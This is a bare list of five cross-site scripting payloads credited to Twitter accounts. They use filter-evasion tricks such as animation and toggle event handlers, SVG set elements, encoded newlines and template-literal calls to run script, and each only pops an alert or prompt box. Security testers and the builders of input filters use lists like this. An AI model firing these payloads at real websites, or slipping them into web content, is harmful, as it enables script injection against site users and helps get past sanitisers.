1. From https://twitter.com/fransrosen

<style>@keyframes
 a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;>
 
 2. From https://twitter.com/security_prince
 
 <marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
 
 3. From https://twitter.com/alxbrsn
  <svg><circle><set onbegin=prompt(1) attributename=fill>
  
 4. From https://twitter.com/s0md3v

<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

5. From https://twitter.com/itsdig

"%3balert`1`%3b"
 
 
 
 
 
 
